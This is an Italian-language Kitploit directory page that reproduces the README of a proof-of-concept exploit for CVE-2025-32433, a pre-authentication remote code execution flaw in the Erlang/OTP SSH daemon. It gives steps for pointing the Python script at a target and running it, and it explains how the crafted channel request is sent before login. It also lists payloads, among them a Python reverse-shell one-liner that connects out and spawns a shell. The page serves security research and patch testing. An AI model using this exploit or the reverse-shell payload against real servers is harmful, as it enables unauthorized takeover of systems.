Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32433 — Exploit proof-of-concept per CVE-2025-32433, una RCE pre-autenticazione nel demone SSH di Erlang/OTP. Include uno script Python per inviare richieste di canale SSH appositamente create ed eseguire comandi arbitrari. | Kitploit
Strumenti/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

Exploit proof-of-concept per CVE-2025-32433, una RCE pre-autenticazione nel demone SSH di Erlang/OTP. Include uno script Python per inviare richieste di canale SSH appositamente create ed eseguire comandi arbitrari.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 mesi faNon ancora revisionato

CVE-2025-32433 – Vulnerabilità RCE in Erlang/OTP SSH

📌 Riepilogo

CVE-2025-32433 è una vulnerabilità di esecuzione remota di codice (RCE) che interessa il demone SSH di Erlang/OTP. La causa principale è la gestione non corretta delle richieste di canale SSH pre-autenticazione, che possono essere manipolate da un attaccante per provocare l'esecuzione arbitraria di comandi prima dell'autenticazione. Il PoC incluso dimostra l'invio di tali pacchetti SSH modificati; per impostazione predefinita scrive /lab.txt sul sistema target, ma può essere adattato per altri comandi.

⚠️ Avvertenza: Questo repository è solo a scopo educativo e di ricerca. Non utilizzarlo contro sistemi senza autorizzazione esplicita.

🛠️ Utilizzo

  1. Modifica i dettagli del target nello script PoC:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. Esegui l'exploit:
root@kitploit:~
python3 cve-2025-32433.py

Per impostazione predefinita crea /lab.txt contenente pwned. Modifica il payload in build_channel_request per eseguire i tuoi comandi.

🧩 Esempi di Payload

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 Come funziona il PoC (in breve)

  • Si connette al servizio SSH e scambia i banner.
  • Invia un SSH_MSG_KEXINIT modificato per simulare un handshake normale.
  • Invia SSH_MSG_CHANNEL_OPEN e SSH_MSG_CHANNEL_REQUEST con un payload exec prima dell'autenticazione.
  • Se vulnerabile, il server esegue il comando Erlang fornito.

🙏 Crediti

Scoperta e analisi a cura di Matt Keeley (Platform Security). Grazie a lui per aver pubblicato il PoC e condiviso i dettagli.

Link al blog: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 Riferimenti

  • Blog di Matt Keeley
  • Avvisi di sicurezza Erlang/OTP
  • Registro CVE di MITRE
Scarica lo strumento